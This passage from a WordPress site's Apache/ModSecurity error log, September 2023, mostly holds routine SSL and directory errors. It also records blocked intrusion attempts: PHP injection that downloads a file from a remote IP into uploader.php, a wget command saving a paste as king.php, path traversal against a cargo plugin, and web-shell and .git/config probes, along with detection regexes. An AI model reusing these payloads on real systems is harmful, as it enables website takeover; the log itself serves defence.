140202029016960] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Sep 04 03:44:40.866687 2023] [ssl:warn] [pid 25687:tid 140202029016960] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Sep 04 14:37:42.995969 2023] [:error] [pid 25707:tid 140201598830336] [client 89.108.118.60:45532] [client 89.108.118.60] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS:sfilecontent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-22.php"] [unique_id "ZPYyBnmVlrqFEdB9Noc7uwAAABU"] [Mon Sep 04 17:56:34.497074 2023] [:error] [pid 25802:tid 140201682757376] [client 41.216.188.164:42912] PHP Fatal error: Uncaught Error: Call to undefined function load_textdomain() in /home/investig/public_html/wp-admin/includes/admin.php:16, referer: www.google.com [Mon Sep 04 17:56:34.497168 2023] [:error] [pid 25802:tid 140201682757376] [client 41.216.188.164:42912] Stack trace:, referer: www.google.com [Mon Sep 04 17:56:34.497184 2023] [:error] [pid 25802:tid 140201682757376] [client 41.216.188.164:42912] #0 {main}, referer: www.google.com [Mon Sep 04 17:56:34.497267 2023] [:error] [pid 25802:tid 140201682757376] [client 41.216.188.164:42912] thrown in /home/investig/public_html/wp-admin/includes/admin.php on line 16, referer: www.google.com [Tue Sep 05 03:15:26.651955 2023] [ssl:warn] [pid 21862:tid 139765311178624] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Sep 05 03:15:30.876048 2023] [ssl:warn] [pid 21863:tid 139765311178624] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Sep 05 03:15:31.175691 2023] [ssl:warn] [pid 21863:tid 139765311178624] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Sep 05 03:15:32.868092 2023] [ssl:warn] [pid 21863:tid 139765311178624] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Sep 05 03:15:35.176090 2023] [ssl:warn] [pid 22280:tid 140469730023296] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Sep 05 03:15:37.387555 2023] [ssl:warn] [pid 22282:tid 140469730023296] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Sep 05 22:28:48.143828 2023] [autoindex:error] [pid 20500:tid 140469547280128] [client 20.219.36.135:39848] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Wed Sep 06 03:19:04.381137 2023] [ssl:warn] [pid 15870:tid 140184297523072] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Sep 06 03:19:08.643736 2023] [ssl:warn] [pid 15872:tid 140184297523072] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Sep 06 03:19:09.146130 2023] [ssl:warn] [pid 15872:tid 140184297523072] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Sep 06 03:19:11.847849 2023] [ssl:warn] [pid 15872:tid 140184297523072] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Sep 06 03:19:14.164806 2023] [ssl:warn] [pid 16373:tid 140235648526208] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Sep 06 03:19:20.402630 2023] [ssl:warn] [pid 16376:tid 140235648526208] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Sep 06 04:39:52.207533 2023] [:error] [pid 17100:tid 140235371439872] [client 179.43.191.18:38476] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Wed Sep 06 04:39:52.489432 2023] [:error] [pid 16397:tid 140235312690944] [client 179.43.191.18:38478] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Wed Sep 06 15:37:30.829916 2023] [autoindex:error] [pid 16397:tid 140235295905536] [client 40.122.207.30:58768] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Sep 06 18:54:56.356888 2023] [autoindex:error] [pid 17100:tid 140235363047168] [client 74.249.251.20:43432] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Wed Sep 06 23:12:12.213105 2023] [authz_core:error] [pid 13105:tid 140235346261760] [client 164.90.222.93:60154] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2023/09/06 23:12:16 [error] 16356#16356: *2029719 access forbidden by rule, client: 164.90.222.93, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Wed Sep 06 23:20:58.824901 2023] [authz_core:error] [pid 16397:tid 140235287512832] [client 139.144.150.23:60426] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2023/09/06 23:21:02 [error] 16356#16356: *2029901 access forbidden by rule, client: 139.144.150.23, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Thu Sep 07 00:13:41.888977 2023] [authz_core:error] [pid 13105:tid 140235253942016] [client 178.62.73.12:36006] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2023/09/07 00:13:46 [error] 16356#16356: *2033045 access forbidden by rule, client: 178.62.73.12, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Thu Sep 07 00:31:29.738066 2023] [ssl:warn] [pid 16376:tid 140235648526208] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Sep 07 00:33:53.405061 2023] [ssl:warn] [pid 16376:tid 140235648526208] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Sep 07 00:34:03.688030 2023] [ssl:warn] [pid 16376:tid 140235648526208] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Sep 07 00:42:11.595332 2023] [ssl:warn] [pid 16376:tid 140235648526208] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Sep 07 03:08:20.697385 2023] [ssl:warn] [pid 26810:tid 139878215722880] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Sep 07 03:08:26.861306 2023] [ssl:warn] [pid 26816:tid 139878215722880] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Sep 07 03:08:27.256031 2023] [ssl:warn] [pid 26816:tid 139878215722880] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Sep 07 03:08:28.864624 2023] [ssl:warn] [pid 26816:tid 139878215722880] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Sep 07 03:08:31.147319 2023] [ssl:warn] [pid 27233:tid 140585347585920] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Sep 07 03:08:31.292569 2023] [ssl:warn] [pid 27234:tid 140585347585920] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Sep 07 05:37:02.725032 2023] [:error] [pid 27256:tid 140585050552064] [client 192.42.116.22:44912] [client 192.42.116.22] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".inc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.inc"] [unique_id "ZPmnzkTmZbNeikguWLOGdAAAAAU"] [Thu Sep 07 08:37:41.205602 2023] [:error] [pid 27257:tid 140584891090688] [client 159.65.44.109:47316] [client 159.65.44.109] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:symyhk. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:symyhk: die(md5(4565462));"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/index.php"] [unique_id "ZPnSJTpVn9gi_zTp62MgxwAAAFg"], referer: investigacionperu.com [Thu Sep 07 10:13:30.133537 2023] [autoindex:error] [pid 27257:tid 140584966625024] [client 5.135.152.155:49384] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2020/05/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Thu Sep 07 11:28:03.941823 2023] [autoindex:error] [pid 27916:tid 140584933054208] [client 168.61.166.51:50944] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive 2023/09/08 02:36:37 [error] 27118#27118: *2051067 openat() "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/-kD8toaNjVZrikrffj8xiKoRnl96gYEguaJ8NOpi0G0" failed (2: No such file or directory), client: 18.188.49.38, server: investigacionperu.com, request: "GET /.well-known/acme-challenge/-kD8toaNjVZrikrffj8xiKoRnl96gYEguaJ8NOpi0G0 HTTP/1.1", host: "investigacionperu.com" 2023/09/08 02:36:37 [error] 27116#27116: *2051069 openat() "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/-kD8toaNjVZrikrffj8xiKoRnl96gYEguaJ8NOpi0G0" failed (2: No such file or directory), client: 23.178.112.105, server: investigacionperu.com, request: "GET /.well-known/acme-challenge/-kD8toaNjVZrikrffj8xiKoRnl96gYEguaJ8NOpi0G0 HTTP/1.1", host: "investigacionperu.com" [Fri Sep 08 03:23:55.973268 2023] [autoindex:error] [pid 27257:tid 140584966625024] [client 198.71.240.35:38254] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/index.php [Fri Sep 08 03:23:58.793721 2023] [autoindex:error] [pid 27257:tid 140584983410432] [client 198.71.240.35:38258] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/index.php [Fri Sep 08 03:31:24.346723 2023] [ssl:warn] [pid 12482:tid 140541940283264] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Sep 08 03:31:28.529859 2023] [ssl:warn] [pid 12483:tid 140541940283264] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Sep 08 03:31:28.915407 2023] [ssl:warn] [pid 12483:tid 140541940283264] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Sep 08 03:31:31.097027 2023] [ssl:warn] [pid 12483:tid 140541940283264] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Sep 08 03:31:33.398215 2023] [ssl:warn] [pid 12902:tid 140500555683712] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Sep 08 03:31:37.624458 2023] [ssl:warn] [pid 12903:tid 140500555683712] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Sep 09 03:41:24.759570 2023] [ssl:warn] [pid 24857:tid 139953890801536] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Sep 09 03:41:26.995893 2023] [ssl:warn] [pid 24858:tid 139953890801536] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Sep 09 03:41:27.531775 2023] [ssl:warn] [pid 24858:tid 139953890801536] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Sep 09 03:41:29.590755 2023] [ssl:warn] [pid 24858:tid 139953890801536] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Sep 09 03:41:31.952159 2023] [ssl:warn] [pid 25278:tid 140582267955072] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Sep 09 03:41:34.211113 2023] [ssl:warn] [pid 25281:tid 140582267955072] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Sep 09 03:41:35.093186 2023] [ssl:warn] [pid 25281:tid 140582267955072] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Sep 09 06:16:37.345228 2023] [:error] [pid 25642:tid 140581913188096] [client 69.164.209.131:34238] [client 69.164.209.131] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:vz. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:vz: $x=fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/wp-admin/css/colors/blue/uploader.php','w+'),file_get_contents('http://51.79.124.111/vz.txt'));echo \\x22aDriv4\\x22.$x;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/css/colors/blue/blue.php"] [unique_id "ZPxUFWa_dehdPghAp3-WmAAAAMw"], referer: www.google.com [Sat Sep 09 07:29:09.239684 2023] [:error] [pid 25434:tid 140581854439168] [client 157.90.171.160:34976] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/wso112233.php [Sat Sep 09 07:29:53.496303 2023] [:error] [pid 25434:tid 140581913188096] [client 157.90.171.160:35002] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/shell20211028.php [Sat Sep 09 08:21:25.599288 2023] [autoindex:error] [pid 25434:tid 140581854439168] [client 168.61.164.225:35658] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Sep 10 03:46:25.782352 2023] [ssl:warn] [pid 1138:tid 140039718639488] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Sep 10 03:46:30.018493 2023] [ssl:warn] [pid 1139:tid 140039718639488] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Sep 10 03:46:30.729701 2023] [ssl:warn] [pid 1139:tid 140039718639488] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Sep 10 03:46:34.033750 2023] [ssl:warn] [pid 1139:tid 140039718639488] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Sep 10 03:46:36.341749 2023] [ssl:warn] [pid 1560:tid 140028742956928] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Sep 10 03:46:40.543323 2023] [ssl:warn] [pid 1562:tid 140028742956928] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Sep 10 10:02:30.309501 2023] [authz_core:error] [pid 1584:tid 140028290172672] [client 167.172.20.95:56238] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2023/09/10 10:02:32 [error] 1442#1442: *2078104 access forbidden by rule, client: 167.172.20.95, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Sun Sep 10 10:11:50.433470 2023] [authz_core:error] [pid 1584:tid 140028449634048] [client 143.110.156.182:56438] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2023/09/10 10:11:54 [error] 1443#1443: *2078172 access forbidden by rule, client: 143.110.156.182, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Sun Sep 10 13:17:50.735980 2023] [autoindex:error] [pid 2550:tid 140028365707008] [client 193.202.110.29:58828] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/plugins/compat3x/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/js/tinymce/plugins/compat3x/css/index.php [Sun Sep 10 13:17:52.941225 2023] [autoindex:error] [pid 2550:tid 140028290172672] [client 193.202.110.29:58838] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/plugins/compat3x/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/js/tinymce/plugins/compat3x/css/index.php [Sun Sep 10 14:05:25.479741 2023] [authz_core:error] [pid 2550:tid 140028483204864] [client 167.71.48.191:59736] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2023/09/10 14:05:31 [error] 1443#1443: *2079943 access forbidden by rule, client: 167.71.48.191, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Sun Sep 10 16:37:19.410977 2023] [autoindex:error] [pid 1583:tid 140028382492416] [client 192.185.176.222:33478] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/PHPMailer/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/PHPMailer/index.php [Mon Sep 11 03:39:19.751031 2023] [ssl:warn] [pid 4733:tid 139697045100416] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Sep 11 03:39:24.009044 2023] [ssl:warn] [pid 4735:tid 139697045100416] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Sep 11 03:39:24.551128 2023] [ssl:warn] [pid 4735:tid 139697045100416] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Sep 11 03:39:27.271652 2023] [ssl:warn] [pid 4735:tid 139697045100416] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Sep 11 03:39:29.483898 2023] [ssl:warn] [pid 5155:tid 140107342489472] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Sep 11 03:39:33.690249 2023] [ssl:warn] [pid 5158:tid 140107342489472] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Sep 11 03:39:34.540902 2023] [ssl:warn] [pid 5158:tid 140107342489472] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name 2023/09/11 05:42:11 [error] 5280#5280: *2087993 access forbidden by rule, client: 143.42.31.89, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2023/09/11 08:25:56 [error] 5279#5279: *2089519 access forbidden by rule, client: 143.42.31.89, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Mon Sep 11 17:06:01.760556 2023] [:error] [pid 5966:tid 140106941794048] [client 179.43.191.18:55776] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Mon Sep 11 17:06:02.099409 2023] [:error] [pid 5311:tid 140106975364864] [client 179.43.191.18:55778] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Mon Sep 11 18:17:28.644504 2023] [autoindex:error] [pid 5311:tid 140107017328384] [client 168.61.166.51:56982] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Sep 12 03:27:45.121011 2023] [ssl:warn] [pid 2821:tid 139622188300160] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Sep 12 03:27:51.325100 2023] [ssl:warn] [pid 2824:tid 139622188300160] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Sep 12 03:27:51.611226 2023] [ssl:warn] [pid 2824:tid 139622188300160] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Sep 12 03:27:53.510401 2023] [ssl:warn] [pid 2824:tid 139622188300160] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Sep 12 03:27:55.790441 2023] [ssl:warn] [pid 3239:tid 140183933749120] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Sep 12 03:27:57.969105 2023] [ssl:warn] [pid 3240:tid 140183933749120] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Sep 12 12:31:43.597555 2023] [autoindex:error] [pid 3919:tid 140183630505728] [client 20.219.36.135:51158] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Tue Sep 12 18:06:43.008641 2023] [authz_core:error] [pid 3260:tid 140183613720320] [client 161.35.27.144:57290] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2023/09/12 18:06:46 [error] 3122#3122: *2110437 access forbidden by rule, client: 161.35.27.144, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Tue Sep 12 18:10:38.827198 2023] [authz_core:error] [pid 3919:tid 140183588542208] [client 45.79.116.95:57364] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2023/09/12 18:10:41 [error] 3123#3123: *2110493 access forbidden by rule, client: 45.79.116.95, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Tue Sep 12 21:01:08.534705 2023] [:error] [pid 3262:tid 140183479437056] [client 128.199.248.115:33108] [client 128.199.248.115] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/wpcargo/includes/barcode.php?text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&sizefactor=.090909090909&size=1&filepath=../../../x.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wpcargo/includes/barcode.php"] [unique_id "ZQEX5Dpb8gOKcqt49dMEngAAAJg"], referer: www.google.com [Tue Sep 12 21:01:10.340673 2023] [:error] [pid 3262:tid 140183734220544] [client 128.199.248.115:33110] [client 128.199.248.115] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:2. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:2: wget https:/pst.klgrth.io/paste/e7yx8/raw -O king.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri 